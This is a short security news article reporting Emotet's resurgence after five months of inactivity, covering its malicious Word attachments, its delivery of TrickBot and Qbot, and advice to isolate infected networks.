Emotet Re-emerges After 5 Month Absence
Researchers found a sharp increase in Emotet after 5 months of inactivity. Emotet steals banking credentials and spread inside targeted networks. Emotet is first in Check Point Technologies' Global Threat Index, impacting 5% of organizations globally. Since February 2020, Emotet's spam campaign started to slow down and eventually stopped but is activity started to increase In July. This is similar to what happened 2019 when the Emotet botnet stopped activity during the summer but resumed in September.
Emotet infects its victims with TrickBot and Qbot, which are used to steal banking credentials and spread inside networks. Some of the spam campaigns contained malicious doc file with names like form.doc or invoice.doc. According to researchers, the malicious attachment launches a PowerShell script to download the Emotet binary from remote websites and infect machines, adding them to the botnet. The resumption of Emotet's activities highlights the scale and power of the botnet globally.
Before stopping it's activities in February, Emotet wass the largest, most active, and sophisticated cybercrime operation. The Emotet gang operates an email spam infrastructure used to infect victims with the Emotet trojan. It then uses this to deploy other malware, either for its own interest or for other cybercriminal groups who rent access to infected hosts.
Since returning from an extended vacation, Emotet email campaigns are once again the most prevalent threat. The group behind Emotet introduced code changes to their malware, such as updates to the email sending module, and picked up a new affiliate payload to distribute Qbot. Emotet remains a highly dangerous threat. Companies and organizations that are infected with Emotet should isolate the infected system and take their entire network offline to prevent the delivery of a ransomware payload.